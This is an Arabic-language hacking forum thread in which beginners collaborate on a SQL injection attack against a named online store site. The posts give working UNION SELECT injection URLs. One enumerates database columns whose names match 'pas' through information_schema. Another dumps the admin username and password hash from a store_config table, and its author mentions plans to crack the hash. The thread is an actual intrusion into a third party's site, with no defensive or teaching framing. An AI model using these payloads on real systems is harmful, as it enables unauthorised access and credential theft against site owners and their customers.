موقع جاهز وانا قمت بحقنه ادخل فيه واقضي عليه

[THE KILLER]

[الحقنة
https://www.kisantech.com/index.php...column_name+LIKE+CHAR(37, 112, 97, 115, 37)--
انا هنا وتوقفت ارجو منكم اكماله

 

[THE KILLER]

انا مبتدئ وهذا ماعرفته ارجو المساعدة
اذا انا راني غالط في شيئ ارجو الارشاد

 

[s-japonia33]

؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟ ~!~

 

[Black_Nerve]

hi BRO
use the exress of "LIMIT x,y"to pull data from data base like this :

https://www.kisantech.com/index.php?cat_id=-4 union select concat(table_name,0x3a,column_name,0x3a,table_schema),2,3,4,5,6,7,8,9,10+from+information_schema.columns+where+column_name+LIKE+CHAR(37, 112, 97, 115, 37) LIMIT x,1--

and change the param "x" from 1 to2.....like this
until
u got some error nd got some intersting info from datbase

 

[THE KILLER]

ارجوكم اخبروني اين اخطأت

 

[مستر داتا بيز]

ههههههههههههههههههههههههههههههههههههههههههههههههه
والله انت غريب اخى سبحان الله انا كنت قاعد اخترق فيه برضه
هههههههههههههههههه
لووووووووووووووووول
يعنى انا وانت شغالين عليه نخترق
ولكن انا فكيت ابوه الحمد لله وهذا هو الاستغلال
قبل ما اوريك الاستغلال اخى الكريم عندما يكون العمود الاول مصاب فى اي موقع يجب تجنب المسافات بعلامة الزائد +
يعنى مثلا
Union+select+COncat.....
لاهر الكود يعنى تجنب اي مسافات بعلامة +
اما بالنسبه للاستغلال انا وصلت له اخى الكريم تفضل لحد اليوزر والباسورد

بس الباسورد ابن كلب عايز فك هاش
تحياتى

https://www.kisantech.com/index.php
?cat_id=-1+union+select+group_concat(user,0x3a,pass),2,3,4,5,6,7,8,9,10+from+store_config--

حاليا انا بقى متعقد عشان ام الهاش ولكن انا لقيت برنامج لزيز جدا ان شاء الله هعمله شرح بالفيديو كيف تنصيبه وشرحه حصري لشبكة العناكب الاحترافية


تحياتى

تلميذ نجيب للاخ فولكانو الحبيب